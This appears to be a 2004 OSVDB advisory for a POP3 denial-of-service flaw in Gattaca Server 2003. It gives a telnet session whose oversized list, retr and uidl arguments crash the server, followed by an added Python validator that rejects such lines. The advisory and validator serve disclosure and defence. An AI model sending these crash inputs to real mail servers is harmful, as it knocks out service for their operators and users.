Gattaca Server 2003 POP3 DoS

2004-07-15T07:17:10
ID OSVDB:7925
Type osvdb
Reporter Dr_insane(dr_insane@pathfinder.gr)
Modified 2004-07-15T07:17:10

Description

Vulnerability Description

Gattaca Server 2003 contains a flaw that may allow a remote denial of service. The issue is triggered when an attacker sends specially crafted list, retr and uidl commands, resulting in a loss of availability for the server.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Manual Testing Notes

C:\>telnet [victim] 110
+OK GeeOS/1.1 POP3 Server ver 1.0, ready.
user test1
+OK User name accepted, password please
pass test1
+OK GeeOS mail box open
list 99999999999999999999999
retr 99999999999999999999999
uidl 98409583490583409539405

The commands above cause the server to crash. The crash produces the following error message: "Unhandled exception in: geeosserv.exe (TMAIL.DLL):0x0000005: access violation."
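
Added example, not part of the original advisory or of the vendor's code: a check on the message-number argument of list, retr and uidl that a POP3 front end or a log-review script could apply to client lines like those in the testing notes. The advisory does not state the root cause, so the 10-digit cap, the mailbox_count parameter and the function names are assumptions made for illustration.

```python
import re

# Commands named in the advisory; each takes a message number as its argument.
MSG_NUMBER_COMMANDS = {"LIST", "RETR", "UIDL"}
# Assumption: cap at 10 digits, the length of the largest 32-bit unsigned value.
MAX_DIGITS = 10


def check_pop3_line(line, mailbox_count):
    """Validate one client line; return (ok, reason)."""
    parts = line.strip().split()
    if not parts:
        return False, "empty command"
    cmd, args = parts[0].upper(), parts[1:]
    if cmd not in MSG_NUMBER_COMMANDS:
        return True, "not a message-number command"
    if not args:
        # RFC 1939: RETR needs a message number; LIST and UIDL may omit it.
        if cmd == "RETR":
            return False, "missing message number"
        return True, "ok"
    if len(args) > 1:
        return False, "too many arguments"
    arg = args[0]
    if not re.fullmatch(r"[0-9]+", arg):
        return False, "argument is not decimal"
    # Check the length before converting, so a fixed-width parser never sees it.
    if len(arg) > MAX_DIGITS:
        return False, "argument too long for a message number"
    if not 1 <= int(arg) <= mailbox_count:
        return False, "no such message"
    return True, "ok"


def flag_session(lines, mailbox_count):
    """Return (line, reason) for every client line that fails validation."""
    results = ((ln, check_pop3_line(ln, mailbox_count)) for ln in lines)
    return [(ln, reason) for ln, (ok, reason) in results if not ok]


# Constructed sample: client lines from the testing notes plus two valid ones.
SAMPLE_SESSION = [
    "user test1", "pass test1",
    "list 99999999999999999999999",
    "retr 99999999999999999999999",
    "uidl 98409583490583409539405",
    "list", "retr 2",
]

if __name__ == "__main__":
    for line, reason in flag_session(SAMPLE_SESSION, mailbox_count=3):
        print(f"REJECT {line!r}: {reason}")
```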

References:

Vendor URL: http://www.gattaca-server.com/
Secunia Advisory ID: 12071
Related OSVDB ID: 7922
Related OSVDB ID: 7924
Related OSVDB ID: 8143
Related OSVDB ID: 7926
Related OSVDB ID: 7923
Related OSVDB ID: 7927
Other Advisory URL: http://members.lycos.co.uk/r34ct/main/Gattaca%20Server%202003.txt
ISS X-Force ID: 16703